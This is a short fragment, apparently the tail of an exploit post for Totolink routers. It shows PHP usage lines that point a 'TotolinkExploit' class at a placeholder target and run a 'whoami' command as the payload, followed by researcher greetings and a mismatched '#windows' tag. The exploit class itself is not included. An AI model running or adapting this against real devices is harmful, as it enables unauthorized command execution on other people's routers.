$targetUri = 'http://target-ip'; // Replace with actual target URL 
$exploit = new TotolinkExploit($targetUri); 
echo $exploit->check(); 
$exploit->exploit('whoami'); // Replace with your payload

Greetings to :===================================================================================== 
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| 
===================================================================================================

Tag

#windows